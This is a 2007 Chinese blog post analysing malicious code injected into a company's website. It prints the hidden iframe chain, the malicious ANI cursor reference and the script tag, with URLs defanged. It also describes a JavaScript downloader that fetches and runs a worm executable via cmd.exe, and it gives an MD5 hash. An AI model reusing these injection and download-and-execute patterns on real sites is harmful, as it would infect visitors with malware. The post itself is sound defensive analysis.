某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码

最新推荐文章于 2019-02-25 17:25:41 发布
最新推荐文章于 2019-02-25 17:25:41 发布
阅读量1.8k 收藏
点赞数
分类专栏: 系统安全 文章标签: iframe javascript function 脚本 url c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1562491
版权

endurer 原创
2007-04-12 第1

网页被加入代码:
/-----
<iframe src=hxxp://www.xa**it*an.cn/mm/mm.htm width=0 height=0></iframe>
---/

mm.htm包含代码:
/---
<iframe src=hxxp://www.97***72*5.com/?01***6 width=0 height=0></iframe>
---/

hxxp://www.97***72*5.com/?01***6

包含代码:
/---
<BODY style='CURSOR: url(hxxp://www.97***72*5.com/m*uxiao***2.jpg)'></BODY>
<script src=hxxp://www.97***72*5.com/06****14.js></script>
---/
hxxp://www.97***72*5.com/m*uxiao***2.jpg(Kaspersky报为:Exploit.Win32.IMG-ANI.k)利用ANI漏洞下载97725.exe

hxxp://www.97***72*5.com/06****14.js

内容为JavaScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 97725.exe,保存到 %windir%,文件名由函数
/---
function gn(n) { var number = Math.random()*n; return '~tmp'+'.tmp'; }
---/
生成,即~tmp.tmp。然后通过Shell.Application 对象 Q的 ShellExecute 方法 执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

文件说明符 : D:/test/97725.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-11 12:54:18
修改时间 : 2007-4-11 12:59:23
访问时间 : 2007-4-11 12:6:24
大小 : 64645 字节 63.133 KB
MD5 : 8d5e8b2ba870f4d23a460ee5c9a2ca7d


Kaspersky报为:Worm.Win32.Viking.ix 

紫郢剑侠
关注
专栏目录
操作123456
qq_65648226的博客
04-28 3548
1.拼音缩写函数 DELIMITER $$ USE `mpos`$$ CREATE FUNCTION `mysql`.`pysx`( wz VARCHAR(20)) RETURNS VARCHAR(20) CHARSET utf8 BEGIN SET @i=1; SET @mcsx=''; SET @len=CHAR_LENGTH(wz); WHILE(@i<=@len) DO S...
对 Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析
Purpleendurer@CSDN
02-21 1606
对 Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析endurer 原创2008-02-21 第1版就是Worm.Win32.Diskgen.gen/磁碟机也捎带广告?http://blog.csdn.net/Purpleendurer/archive/2008/02/20/2110363.aspx中的捕获的一个病毒文件。文件说明符 : C:
某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
Purpleendurer@CSDN
04-30 2103
endurer 原创2007-04-30 第1版该网站的留言板页面:/---<Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe>---/被植入代码:/---<iframe src
又是神经网络!还能用来盗取XX女演员信息
weixin_33854644的博客
05-02 960
四月初,名为Egor Tsvetkov的俄罗斯摄影师利用照片和应用程序FindFace(能利用面部识别将社交媒体帐户信息与照片联系起来的神经网络),向我们展示了我们究竟故意在网上泄露了多少信息。不幸的是,他试图警告我们的东西已经变为了现实。 据Global Voices报道,在俄罗斯媒体报道了Tsvetkov的项目过后三天,俄罗斯类似4Chan的在线...
威胁快报|ProtonMiner挖矿蠕虫扩大攻击面,加速传播 ...
weixin_33924312的博客
02-25 301
​​背景 近日,阿里云安全监测到一种挖矿蠕虫,正在互联网上加速传播。阿里云安全根据它使用ProtonMail邮箱地址作为矿池用户名的行为,将其命名为ProtonMiner。据分析,这种蠕虫与TrendMicro于2018年12月曾报导过的“利用ElasticSearch旧漏洞传播的蠕虫”非常相似,可能是同一团伙所为。但与先前报导不同的是,二月中旬,该挖矿...
ani.rar_.ani_ani
09-23
标题中的"ani.rar_.ani_ani"暗示了这个压缩包包含与".ani"文件格式相关的资源,这是一种用于存储位图动画的格式,常见于Windows操作系统中。描述提到"公爵位图动画的实现",这可能是指一个示例或项目,用于演示如何...
MRFC.rar_MRFC_ani06.com_进程与线程
09-23
3. nwseresize.ani、ewresize.ani、neswresize.ani、nsresize.ani:这些通常与窗口的四个角和边的拖动缩放动画相关。 4. SOVIET~1.ANI:可能是一个苏联主题的动画,可能是为了某种特定的视觉效果。 5. wait.ani:...
ANIReader:3DO Army Men * .ani转换器到PNG
05-16
用于3DO Army Men * .ani的转换器转换为PNG。 需要python3和枕头 用法:unpacker.py [-o outdir] [-v] [-h] filename.ani -h打印此帮助 -o指定输出目录 -v详细解包 参数可以以任何顺序出现,但输入.ani必须排在...
ani.rar_ani
09-23
本文将深入探讨如何使用Visual Basic (VB)编程语言来处理和使用动画光标,具体以"ani.rar_ani"项目为例,该项目包含Neko.ani动画光标文件、UseAniCursor.exe可执行文件以及相关的VB工程文件。 首先,我们来看标题...
神鬼传奇游戏鼠标ani文件 mouse.rar
06-05
《神鬼传奇鼠标ani文件 mouse.rar》是一款专为游戏爱好者设计的动态鼠标指针资源包。这个压缩包中包含了丰富的ani格式动态鼠标动画,适用于神鬼传奇或其他具有类似主题的游戏,为玩家提供更加生动、个性化的操作体验...
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
Purpleendurer@CSDN
04-09 1656
endurer 原创2007-04-09 第1版该论坛采用phpwind系统,被加入代码:/---<DIV style="CURSOR: url(hxxp://world***ao**fwr.net/level***/75***17*p.jpg)"></DIV>---/hxxp://world***ao**fwr.net/level***/75***17*p.jpg(Kaspers
python调用C++,C++回调Python,并传递参数
caobin0825的博客
03-21 7581
#include&lt;iostream&gt;#include&lt;string.h&gt;using namespace std;//该文件名称:cpptest.cpp//终端下编译指令://g++ -o cpptest.so -shared -fPIC cpptest.cpptypedef unsigned char byte;struct sub_Struct{    int sub_t...
"永恒之蓝"勒索病毒凶猛 周一上班请用正确姿势打开电脑
weixin_34106122的博客
05-02 197
"永恒之蓝"勒索病毒凶猛 周一上班请用正确姿势打开电脑 一、概述 上个周末,对于网络安全圈来说可以用“血雨腥风”来形容。北京时间5月12日开始,全球范围内爆发了基于Windows网络共享协议进行攻击传播的“永恒之蓝”勒索病毒。截止发稿时为止,包括美国、俄罗斯以及整个欧洲在内的100多个国家,及国内众多大型企事业单位内网和政府机构专网中招,电脑磁盘...
使用ani鼠标指针
weixin_30553065的博客
01-10 627
Code publicclassWin32API { [DllImport("user32.dll")] publicstaticexternIntPtrLoadCursorFromFile(strings); } 设置光标: IntPtrcursor=Win32API...
网友电脑中发现灰鸽子Hacker.com.cn.exe
Purpleendurer@CSDN
03-12 2427
endurer 原创2007-03-12 第1版收到一位网友发来的email,只有HijackThis的log,没有说明电脑出了什么问题。在HijackThis 扫描的 log中,发现如下可疑项:/---Logfile of HijackThis v1.99.1Scan saved at 19:41:54, on 2007-3-10Platform: Windows XP SP2 (W
baidu又作恶了
weixin_34384915的博客
11-16 79
baidu又作恶了。一同事电脑中的IE6一启动就出错退出,检查加载项,发现4个baidu的东东,全禁用,IE就能正常启动了。BaiDu不s,害人不止~ 转载于:https://blog.51cto.com/endurer/716497...
威胁快报|首爆新型ibus蠕虫,利用热门漏洞疯狂挖矿牟利 ...
测试0901-1
02-01 259
一、背景 近日阿里云安全团队发现了一起利用多个流行漏洞传播的蠕虫事件。黑客首先利用ThinkPHP远程命令执行等多个热门漏洞控制大量主机,并将其中一台“肉鸡”作为蠕虫脚本的下载源。其余受控主机下载并运行此蠕虫脚本后,继续进行大规模漏洞扫描和弱口令爆破攻击,从而实现横向传播。涉及的漏洞除了ThinkPHP远程命令执行漏洞,还有JBoss、Weblogic、...
ffmpeg源码分析之媒体打开过程
爱自在的专栏
09-15 840
http://blog.chinaunix.net/uid-26611383-id-3971425.html
冒险岛back节点中ani.0.0.moveP是什么意思
最新发布
07-14
在冒险岛中,back节点是指角色的后方节点,而ani.0.0.moveP则表示该节点在垂直方向上的移动动画。具体来说,ani.0.0.moveP表示角色后方节点在垂直方向上的移动速度。这个数值可以用来控制角色后方节点的垂直运动,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值